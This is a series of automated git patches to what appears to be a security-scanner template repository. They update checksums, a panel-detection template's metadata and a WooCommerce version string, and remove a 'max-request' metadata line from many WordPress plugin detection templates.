@@ -2640,7 +2640,7 @@ http/cves/2023/CVE-2023-39361.yaml:027864ed06754ef87a7de376519681d526b46eb6
 http/cves/2023/CVE-2023-39598.yaml:8e973be5da8bbccce493cb02d6a2c314605b02a6
 http/cves/2023/CVE-2023-39600.yaml:c326d0e518d5a41c899dbf0a15c6d4e28f00b705
 http/cves/2023/CVE-2023-39676.yaml:66ffbd384c6992c5a70fc66c29a75aa2fdd22f3b
-http/cves/2023/CVE-2023-39677.yaml:4feca8145618681d4c45940f4ec6b0dc80eddf23
+http/cves/2023/CVE-2023-39677.yaml:daf8c05e33f87e1b63ab7d55a6a05773034db0ac
 http/cves/2023/CVE-2023-4173.yaml:6b300087c13e3a095031bc1a2d0f8d8590f1a6d8
 http/cves/2023/CVE-2023-4174.yaml:d2cf616712e64eea743b6c401fbfd482418ec12e
 http/cves/2023/CVE-2023-4634.yaml:c5b05622b14f1397f91ad6fe9fb478b3c769e071
@@ -3449,6 +3449,7 @@ http/exposed-panels/qnap/qnap-qts-panel.yaml:987c5b15892453260e2d2fcbf96ed0bffb2
 http/exposed-panels/qualcomm-voip-router.yaml:fbd84bcc4a04ba558a62d48ce65d874626757771
 http/exposed-panels/qualtrics-login.yaml:cfa330c28b27942418931e248870124b790b00a3
 http/exposed-panels/quantum-scalar-detect.yaml:dcde0ece30651367a1914e8a38e2e317781f8f76
+http/exposed-panels/quilium-panel.yaml:fd215fa4737210fbecd82c8e66b18940173c6ce3
 http/exposed-panels/r-webserver-login.yaml:c0bd628edcce513e246ccc3ae374957b26abc607
 http/exposed-panels/rabbitmq-dashboard.yaml:a2652c4844e3bb702e48e61cdac34df3577fa073
 http/exposed-panels/racksnet-login.yaml:9e07660fba85e9b56a0059d93fa5c82c4ef395ea
@@ -7072,7 +7073,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
 ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:80942f2012cf892edb137a2c2fe6e6850e3eccb4
+templates-checksum.txt:6c9cfc87c5b22aaab0caf646fafc7c76bd8a671f
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
 workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f

From ef852238d4f78ba6b32983f08e525ef996736ee1 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Fri, 15 Sep 2023 17:11:20 +0000
Subject: [PATCH 0393/1090] TemplateMan Update [Fri Sep 15 17:11:19 UTC 2023]
 :robot:

---
 http/exposed-panels/quilium-panel.yaml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/http/exposed-panels/quilium-panel.yaml b/http/exposed-panels/quilium-panel.yaml
index 902d38f94a..d353ff7322 100644
--- a/http/exposed-panels/quilium-panel.yaml
+++ b/http/exposed-panels/quilium-panel.yaml
@@ -9,9 +9,9 @@ info:
   reference:
     - https://www.quilium.io/
   metadata:
-    max-request: 1
-    verified: true
+    max-request: 2
     shodan-query: http.html:"CMS Quilium"
+    verified: true
   tags: panel,quilium,login,detect
 
 http:

From 979f53158d0c54a0c70c5bb8db6289fc12159800 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Sat, 16 Sep 2023 04:02:00 +0000
Subject: [PATCH 0394/1090] Auto WordPress Plugins Update [Sat Sep 16 04:02:00
 UTC 2023] :robot:

---
 helpers/wordpress/plugins/woocommerce.txt                       | 2 +-
 http/technologies/wordpress/plugins/ad-inserter.yaml            | 1 -
 http/technologies/wordpress/plugins/add-to-any.yaml             | 1 -
 http/technologies/wordpress/plugins/admin-menu-editor.yaml      | 1 -
 http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 -
 http/technologies/wordpress/plugins/akismet.yaml                | 1 -
 .../wordpress/plugins/all-404-redirect-to-homepage.yaml         | 1 -
 http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml    | 1 -
 .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 -
 .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml  | 1 -
 http/technologies/wordpress/plugins/amp.yaml                    | 1 -
 http/technologies/wordpress/plugins/antispam-bee.yaml           | 1 -
 http/technologies/wordpress/plugins/astra-sites.yaml            | 1 -
 http/technologies/wordpress/plugins/astra-widgets.yaml          | 1 -
 http/technologies/wordpress/plugins/autoptimize.yaml            | 1 -
 http/technologies/wordpress/plugins/backwpup.yaml               | 1 -
 http/technologies/wordpress/plugins/better-search-replace.yaml  | 1 -
 http/technologies/wordpress/plugins/better-wp-security.yaml     | 1 -
 .../wordpress/plugins/black-studio-tinymce-widget.yaml          | 1 -
 http/technologies/wordpress/plugins/breadcrumb-navxt.yaml       | 1 -
 http/technologies/wordpress/plugins/breeze.yaml                 | 1 -
 http/technologies/wordpress/plugins/broken-link-checker.yaml    | 1 -
 .../wordpress/plugins/child-theme-configurator.yaml             | 1 -
 http/technologies/wordpress/plugins/classic-editor.yaml         | 1 -
 http/technologies/wordpress/plugins/classic-widgets.yaml        | 1 -
 .../wordpress/plugins/click-to-chat-for-whatsapp.yaml           | 1 -
 http/technologies/wordpress/plugins/cmb2.yaml                   | 1 -
 http/technologies/wordpress/plugins/coblocks.yaml               | 1 -
 http/technologies/wordpress/plugins/code-snippets.yaml          | 1 -
 http/technologies/wordpress/plugins/coming-soon.yaml            | 1 -
 http/technologies/wordpress/plugins/complianz-gdpr.yaml         | 1 -
 .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 -
 http/technologies/wordpress/plugins/contact-form-7.yaml         | 1 -
 http/technologies/wordpress/plugins/contact-form-cfdb7.yaml     | 1 -
 http/technologies/wordpress/plugins/cookie-law-info.yaml        | 1 -
 http/technologies/wordpress/plugins/cookie-notice.yaml          | 1 -
 http/technologies/wordpress/plugins/creame-whatsapp-me.yaml     | 1 -
 .../wordpress/plugins/creative-mail-by-constant-contact.yaml    | 1 -
 http/technologies/wordpress/plugins/custom-css-js.yaml          | 1 -
 http/technologies/wordpress/plugins/custom-fonts.yaml           | 1 -
 http/technologies/wordpress/plugins/custom-post-type-ui.yaml    | 1 -
 http/technologies/wordpress/plugins/disable-comments.yaml       | 1 -
 http/technologies/wordpress/plugins/disable-gutenberg.yaml      | 1 -
 http/technologies/wordpress/plugins/duplicate-page.yaml         | 1 -
 http/technologies/wordpress/plugins/duplicate-post.yaml         | 1 -
 http/technologies/wordpress/plugins/duplicator.yaml             | 1 -
 .../wordpress/plugins/duracelltomi-google-tag-manager.yaml      | 1 -
 http/technologies/wordpress/plugins/easy-fancybox.yaml          | 1 -
 http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 -
 http/technologies/wordpress/plugins/easy-wp-smtp.yaml           | 1 -
 http/technologies/wordpress/plugins/elementor.yaml              | 1 -
 http/technologies/wordpress/plugins/elementskit-lite.yaml       | 1 -
 http/technologies/wordpress/plugins/enable-media-replace.yaml   | 1 -
 http/technologies/wordpress/plugins/envato-elements.yaml        | 1 -
 .../wordpress/plugins/essential-addons-for-elementor-lite.yaml  | 1 -
 http/technologies/wordpress/plugins/ewww-image-optimizer.yaml   | 1 -
 .../wordpress/plugins/facebook-for-woocommerce.yaml             | 1 -
 http/technologies/wordpress/plugins/fast-indexing-api.yaml      | 1 -
 .../wordpress/plugins/favicon-by-realfavicongenerator.yaml      | 1 -
 http/technologies/wordpress/plugins/flamingo.yaml               | 1 -
 http/technologies/wordpress/plugins/fluentform.yaml             | 1 -
 http/technologies/wordpress/plugins/font-awesome.yaml           | 1 -
 .../wordpress/plugins/force-regenerate-thumbnails.yaml          | 1 -
 http/technologies/wordpress/plugins/formidable.yaml             | 1 -
 http/technologies/wordpress/plugins/forminator.yaml             | 1 -
 http/technologies/wordpress/plugins/ga-google-analytics.yaml    | 1 -
 http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 -
 .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml    | 1 -
 .../wordpress/plugins/google-analytics-for-wordpress.yaml       | 1 -
 .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 -
 http/technologies/wordpress/plugins/google-site-kit.yaml        | 1 -
 .../wordpress/plugins/google-sitemap-generator.yaml             | 1 -
 http/technologies/wordpress/plugins/gtranslate.yaml             | 1 -
 http/technologies/wordpress/plugins/gutenberg.yaml              | 1 -
 http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 -
 .../wordpress/plugins/header-footer-code-manager.yaml           | 1 -
 .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 -
 http/technologies/wordpress/plugins/header-footer.yaml          | 1 -
 http/technologies/wordpress/plugins/health-check.yaml           | 1 -
 http/technologies/wordpress/plugins/hello-dolly.yaml            | 1 -
 http/technologies/wordpress/plugins/host-webfonts-local.yaml    | 1 -
 http/technologies/wordpress/plugins/imagify.yaml                | 1 -
 http/technologies/wordpress/plugins/imsanity.yaml               | 1 -
 .../wordpress/plugins/insert-headers-and-footers.yaml           | 1 -
 http/technologies/wordpress/plugins/instagram-feed.yaml         | 1 -
 .../wordpress/plugins/intuitive-custom-post-order.yaml          | 1 -
 http/technologies/wordpress/plugins/iwp-client.yaml             | 1 -
 http/technologies/wordpress/plugins/jetpack-boost.yaml          | 1 -
 http/technologies/wordpress/plugins/jetpack.yaml                | 1 -
 http/technologies/wordpress/plugins/kadence-blocks.yaml         | 1 -
 http/technologies/wordpress/plugins/kirki.yaml                  | 1 -
 http/technologies/wordpress/plugins/leadin.yaml                 | 1 -
 .../wordpress/plugins/limit-login-attempts-reloaded.yaml        | 1 -
 http/technologies/wordpress/plugins/limit-login-attempts.yaml   | 1 -
 http/technologies/wordpress/plugins/litespeed-cache.yaml        | 1 -
 http/technologies/wordpress/plugins/loco-translate.yaml         | 1 -
 http/technologies/wordpress/plugins/loginizer.yaml              | 1 -
 http/technologies/wordpress/plugins/loginpress.yaml             | 1 -
 .../wordpress/plugins/mailchimp-for-woocommerce.yaml            | 1 -
 http/technologies/wordpress/plugins/mailchimp-for-wp.yaml       | 1 -
 http/technologies/wordpress/plugins/mailpoet.yaml               | 1 -
 http/technologies/wordpress/plugins/maintenance.yaml            | 1 -
 http/technologies/wordpress/plugins/mainwp-child.yaml           | 1 -
 http/technologies/wordpress/plugins/malcare-security.yaml       | 1 -
 http/technologies/wordpress/plugins/megamenu.yaml               | 1 -
 http/technologies/wordpress/plugins/members.yaml                | 1 -
 http/technologies/wordpress/plugins/meta-box.yaml               | 1 -
 http/technologies/wordpress/plugins/ml-slider.yaml              | 1 -
 http/technologies/wordpress/plugins/newsletter.yaml             | 1 -
 .../wordpress/plugins/nextend-facebook-connect.yaml             | 1 -
 http/technologies/wordpress/plugins/nextgen-gallery.yaml        | 1 -
 http/technologies/wordpress/plugins/ninja-forms.yaml            | 1 -
 http/technologies/wordpress/plugins/ocean-extra.yaml            | 1 -
 .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 -
 http/technologies/wordpress/plugins/one-click-demo-import.yaml  | 1 -
 http/technologies/wordpress/plugins/optinmonster.yaml           | 1 -
 http/technologies/wordpress/plugins/otter-blocks.yaml           | 1 -
 http/technologies/wordpress/plugins/password-protected.yaml     | 1 -
 http/technologies/wordpress/plugins/pdf-embedder.yaml           | 1 -
 .../wordpress/plugins/pinterest-for-woocommerce.yaml            | 1 -
 http/technologies/wordpress/plugins/pixelyoursite.yaml          | 1 -
 http/technologies/wordpress/plugins/polylang.yaml               | 1 -
 http/technologies/wordpress/plugins/popup-builder.yaml          | 1 -
 http/technologies/wordpress/plugins/popup-maker.yaml            | 1 -
 http/technologies/wordpress/plugins/post-smtp.yaml              | 1 -
 http/technologies/wordpress/plugins/post-types-order.yaml       | 1 -
 .../wordpress/plugins/premium-addons-for-elementor.yaml         | 1 -
 http/technologies/wordpress/plugins/pretty-link.yaml            | 1 -
 http/technologies/wordpress/plugins/really-simple-captcha.yaml  | 1 -
 http/technologies/wordpress/plugins/really-simple-ssl.yaml      | 1 -
 http/technologies/wordpress/plugins/redirection.yaml            | 1 -
 http/technologies/wordpress/plugins/redux-framework.yaml        | 1 -
 http/technologies/wordpress/plugins/regenerate-thumbnails.yaml  | 1 -
 http/technologies/wordpress/plugins/safe-svg.yaml               | 1 -
 http/technologies/wordpress/plugins/seo-by-rank-math.yaml       | 1 -
 http/technologies/wordpress/plugins/sg-cachepress.yaml          | 1 -
 http/technologies/wordpress/plugins/sg-security.yaml            | 1 -
 http/technologies/wordpress/plugins/shortcodes-ultimate.yaml    | 1 -
 .../wordpress/plugins/shortpixel-image-optimiser.yaml           | 1 -
 .../wordpress/plugins/simple-custom-post-order.yaml             | 1 -
 http/technologies/wordpress/plugins/siteguard.yaml              | 1 -
 http/technologies/wordpress/plugins/siteorigin-panels.yaml      | 1 -
 http/technologies/wordpress/plugins/smart-slider-3.yaml         | 1 -
 http/technologies/wordpress/plugins/so-widgets-bundle.yaml      | 1 -
 .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml  | 1 -
 http/technologies/wordpress/plugins/sucuri-scanner.yaml         | 1 -
 http/technologies/wordpress/plugins/svg-support.yaml            | 1 -
 http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 -
 http/technologies/wordpress/plugins/tablepress.yaml             | 1 -
 http/technologies/wordpress/plugins/taxonomy-terms-order.yaml   | 1 -
 http/technologies/wordpress/plugins/the-events-calendar.yaml    | 1 -
 http/technologies/wordpress/plugins/themeisle-companion.yaml    | 1 -
 http/technologies/wordpress/plugins/tinymce-advanced.yaml       | 1 -
 .../wordpress/plugins/translatepress-multilingual.yaml          | 1 -
 .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml        | 1 -
 .../technologies/wordpress/plugins/under-construction-page.yaml | 1 -
 http/technologies/wordpress/plugins/updraftplus.yaml            | 1 -
 http/technologies/wordpress/plugins/use-any-font.yaml           | 1 -
 http/technologies/wordpress/plugins/user-role-editor.yaml       | 1 -
 .../wordpress/plugins/velvet-blues-update-urls.yaml             | 1 -
 http/technologies/wordpress/plugins/w3-total-cache.yaml         | 1 -
 .../wordpress/plugins/webp-converter-for-media.yaml             | 1 -
 http/technologies/wordpress/plugins/webp-express.yaml           | 1 -
 .../wordpress/plugins/widget-importer-exporter.yaml             | 1 -
 .../wordpress/plugins/woo-cart-abandonment-recovery.yaml        | 1 -
 .../wordpress/plugins/woo-checkout-field-editor-pro.yaml        | 1 -
 http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 -
 .../plugins/woocommerce-gateway-paypal-express-checkout.yaml    | 1 -
 .../wordpress/plugins/woocommerce-gateway-stripe.yaml           | 1 -
 http/technologies/wordpress/plugins/woocommerce-payments.yaml   | 1 -
 .../wordpress/plugins/woocommerce-paypal-payments.yaml          | 1 -
 .../plugins/woocommerce-pdf-invoices-packing-slips.yaml         | 1 -
 http/technologies/wordpress/plugins/woocommerce-services.yaml   | 1 -
 http/technologies/wordpress/plugins/woocommerce.yaml            | 1 -
 http/technologies/wordpress/plugins/wordfence.yaml              | 1 -
 http/technologies/wordpress/plugins/wordpress-importer.yaml     | 1 -
 http/technologies/wordpress/plugins/wordpress-seo.yaml          | 1 -
 http/technologies/wordpress/plugins/worker.yaml                 | 1 -
 http/technologies/wordpress/plugins/wp-fastest-cache.yaml       | 1 -
 http/technologies/wordpress/plugins/wp-file-manager.yaml        | 1 -
 http/technologies/wordpress/plugins/wp-google-maps.yaml         | 1 -
 http/technologies/wordpress/plugins/wp-mail-smtp.yaml           | 1 -
 http/technologies/wordpress/plugins/wp-maintenance-mode.yaml    | 1 -
 http/technologies/wordpress/plugins/wp-migrate-db.yaml          | 1 -
 http/technologies/wordpress/plugins/wp-multibyte-patch.yaml     | 1 -
 http/technologies/wordpress/plugins/wp-optimize.yaml            | 1 -
 http/technologies/wordpress/plugins/wp-pagenavi.yaml            | 1 -
 http/technologies/wordpress/plugins/wp-reset.yaml               | 1 -
 .../wordpress/plugins/wp-reviews-plugin-for-google.yaml         | 1 -
 http/technologies/wordpress/plugins/wp-rollback.yaml            | 1 -
 http/technologies/wordpress/plugins/wp-sitemap-page.yaml        | 1 -
 http/technologies/wordpress/plugins/wp-smushit.yaml             | 1 -
 http/technologies/wordpress/plugins/wp-statistics.yaml          | 1 -
 http/technologies/wordpress/plugins/wp-super-cache.yaml         | 1 -
 http/technologies/wordpress/plugins/wp-user-avatar.yaml         | 1 -
 http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml        | 1 -
 http/technologies/wordpress/plugins/wpcf7-redirect.yaml         | 1 -
 http/technologies/wordpress/plugins/wpforms-lite.yaml           | 1 -
 http/technologies/wordpress/plugins/wps-hide-login.yaml         | 1 -
 http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml  | 1 -
 .../wordpress/plugins/yith-woocommerce-wishlist.yaml            | 1 -
 201 files changed, 1 insertion(+), 201 deletions(-)

diff --git a/helpers/wordpress/plugins/woocommerce.txt b/helpers/wordpress/plugins/woocommerce.txt
index da15618101..42ed2d7782 100644
--- a/helpers/wordpress/plugins/woocommerce.txt
+++ b/helpers/wordpress/plugins/woocommerce.txt
@@ -1 +1 @@
-8.1.0
\ No newline at end of file
+8.1.1
\ No newline at end of file
diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml
index ebb5ba1042..7cbd1855ae 100644
--- a/http/technologies/wordpress/plugins/ad-inserter.yaml
+++ b/http/technologies/wordpress/plugins/ad-inserter.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ad-inserter/
   metadata:
-    max-request: 1
     plugin_namespace: ad-inserter
     wpscan: https://wpscan.com/plugin/ad-inserter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml
index fddfbf3118..8d579ff23d 100644
--- a/http/technologies/wordpress/plugins/add-to-any.yaml
+++ b/http/technologies/wordpress/plugins/add-to-any.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/add-to-any/
   metadata:
-    max-request: 1
     plugin_namespace: add-to-any
     wpscan: https://wpscan.com/plugin/add-to-any
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
index 7a6e8a76ec..4a6d8b7bbe 100644
--- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml
+++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/admin-menu-editor/
   metadata:
-    max-request: 1
     plugin_namespace: admin-menu-editor
     wpscan: https://wpscan.com/plugin/admin-menu-editor
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
index 940c0e614c..e4eb308d39 100644
--- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
+++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/advanced-custom-fields/
   metadata:
-    max-request: 1
     plugin_namespace: advanced-custom-fields
     wpscan: https://wpscan.com/plugin/advanced-custom-fields
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml
index ac77f4e5f5..f68ad2a6bf 100644
--- a/http/technologies/wordpress/plugins/akismet.yaml
+++ b/http/technologies/wordpress/plugins/akismet.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/akismet/
   metadata:
-    max-request: 1
     plugin_namespace: akismet
     wpscan: https://wpscan.com/plugin/akismet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
index 90aa5881fd..10f104f2c7 100644
--- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
+++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-404-redirect-to-homepage/
   metadata:
-    max-request: 1
     plugin_namespace: all-404-redirect-to-homepage
     wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
index 1bf337da6c..8addc28ded 100644
--- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-seo-pack/
   metadata:
-    max-request: 1
     plugin_namespace: all-in-one-seo-pack
     wpscan: https://wpscan.com/plugin/all-in-one-seo-pack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
index 7cec152555..2e579621ac 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-migration/
   metadata:
-    max-request: 1
     plugin_namespace: all-in-one-wp-migration
     wpscan: https://wpscan.com/plugin/all-in-one-wp-migration
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
index 8a4b6133cd..41e297ffeb 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/
   metadata:
-    max-request: 1
     plugin_namespace: all-in-one-wp-security-and-firewall
     wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml
index cfa2e3d080..0dd8686ec3 100644
--- a/http/technologies/wordpress/plugins/amp.yaml
+++ b/http/technologies/wordpress/plugins/amp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/amp/
   metadata:
-    max-request: 1
     plugin_namespace: amp
     wpscan: https://wpscan.com/plugin/amp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml
index a92d9bde4e..359671f3bd 100644
--- a/http/technologies/wordpress/plugins/antispam-bee.yaml
+++ b/http/technologies/wordpress/plugins/antispam-bee.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/antispam-bee/
   metadata:
-    max-request: 1
     plugin_namespace: antispam-bee
     wpscan: https://wpscan.com/plugin/antispam-bee
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml
index 59144c7dd5..116e0c420a 100644
--- a/http/technologies/wordpress/plugins/astra-sites.yaml
+++ b/http/technologies/wordpress/plugins/astra-sites.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-sites/
   metadata:
-    max-request: 1
     plugin_namespace: astra-sites
     wpscan: https://wpscan.com/plugin/astra-sites
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml
index df06ba2f35..dc4703ef8d 100644
--- a/http/technologies/wordpress/plugins/astra-widgets.yaml
+++ b/http/technologies/wordpress/plugins/astra-widgets.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-widgets/
   metadata:
-    max-request: 1
     plugin_namespace: astra-widgets
     wpscan: https://wpscan.com/plugin/astra-widgets
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml
index 2a79d529cc..1426ac3ef2 100644
--- a/http/technologies/wordpress/plugins/autoptimize.yaml
+++ b/http/technologies/wordpress/plugins/autoptimize.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/autoptimize/
   metadata:
-    max-request: 1
     plugin_namespace: autoptimize
     wpscan: https://wpscan.com/plugin/autoptimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml
index 556a113acc..78d1651ff4 100644
--- a/http/technologies/wordpress/plugins/backwpup.yaml
+++ b/http/technologies/wordpress/plugins/backwpup.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/backwpup/
   metadata:
-    max-request: 1
     plugin_namespace: backwpup
     wpscan: https://wpscan.com/plugin/backwpup
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml
index 58d9a9d738..f7219b373d 100644
--- a/http/technologies/wordpress/plugins/better-search-replace.yaml
+++ b/http/technologies/wordpress/plugins/better-search-replace.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/better-search-replace/
   metadata:
-    max-request: 1
     plugin_namespace: better-search-replace
     wpscan: https://wpscan.com/plugin/better-search-replace
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml
index 6c9c485079..f688a68f72 100644
--- a/http/technologies/wordpress/plugins/better-wp-security.yaml
+++ b/http/technologies/wordpress/plugins/better-wp-security.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/better-wp-security/
   metadata:
-    max-request: 1
     plugin_namespace: better-wp-security
     wpscan: https://wpscan.com/plugin/better-wp-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
index 7631e87d78..00e95c4263 100644
--- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
+++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/black-studio-tinymce-widget/
   metadata:
-    max-request: 1
     plugin_namespace: black-studio-tinymce-widget
     wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
index c7daa26ac6..212b2b13c4 100644
--- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
+++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/breadcrumb-navxt/
   metadata:
-    max-request: 1
     plugin_namespace: breadcrumb-navxt
     wpscan: https://wpscan.com/plugin/breadcrumb-navxt
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml
index 68767e4dce..6318392c5c 100644
--- a/http/technologies/wordpress/plugins/breeze.yaml
+++ b/http/technologies/wordpress/plugins/breeze.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/breeze/
   metadata:
-    max-request: 1
     plugin_namespace: breeze
     wpscan: https://wpscan.com/plugin/breeze
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml
index 073618936d..e1a2a186e0 100644
--- a/http/technologies/wordpress/plugins/broken-link-checker.yaml
+++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/broken-link-checker/
   metadata:
-    max-request: 1
     plugin_namespace: broken-link-checker
     wpscan: https://wpscan.com/plugin/broken-link-checker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
index 6aabc19e9f..23614882a7 100644
--- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml
+++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/child-theme-configurator/
   metadata:
-    max-request: 1
     plugin_namespace: child-theme-configurator
     wpscan: https://wpscan.com/plugin/child-theme-configurator
   tags: tech,wordpress,wp-plugin,top-200
